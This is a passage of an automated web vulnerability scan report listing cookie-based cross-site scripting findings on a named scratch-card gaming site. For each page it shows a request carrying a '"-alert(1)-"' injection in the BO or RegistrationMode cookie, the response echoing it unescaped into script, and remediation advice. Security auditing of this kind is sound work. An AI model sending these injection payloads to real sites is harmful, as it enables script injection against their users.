Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMc00d9"-alert(1)-"58ee19908e3; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: BO=FMc00d9"-alert(1)-"58ee19908e3; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc00d9"-alert(1)-"58ee19908e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd02"-alert(1)-"7f6a71d7a39 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdcd02"-alert(1)-"7f6a71d7a39";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6100"-alert(1)-"98a251159eb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb6100"-alert(1)-"98a251159eb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FMb6100"-alert(1)-"98a251159eb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb6100"-alert(1)-"98a251159eb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ced5"-alert(1)-"413d8871f9d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8ced5"-alert(1)-"413d8871f9d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5d81"-alert(1)-"17298092768 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMe5d81"-alert(1)-"17298092768; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: BO=FMe5d81"-alert(1)-"17298092768; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe5d81"-alert(1)-"17298092768";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8fc"-alert(1)-"38f2ab8268e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMce8fc"-alert(1)-"38f2ab8268e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede9a"-alert(1)-"527fff7e23e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMede9a"-alert(1)-"527fff7e23e; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: BO=FMede9a"-alert(1)-"527fff7e23e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMede9a"-alert(1)-"527fff7e23e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9953"-alert(1)-"b55f2d4f8e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa9953"-alert(1)-"b55f2d4f8e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f142"-alert(1)-"53426c7c4b6 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4f142"-alert(1)-"53426c7c4b6; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: BO=FM4f142"-alert(1)-"53426c7c4b6; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4f142"-alert(1)-"53426c7c4b6";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51939"-alert(1)-"91ead81e5ee was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

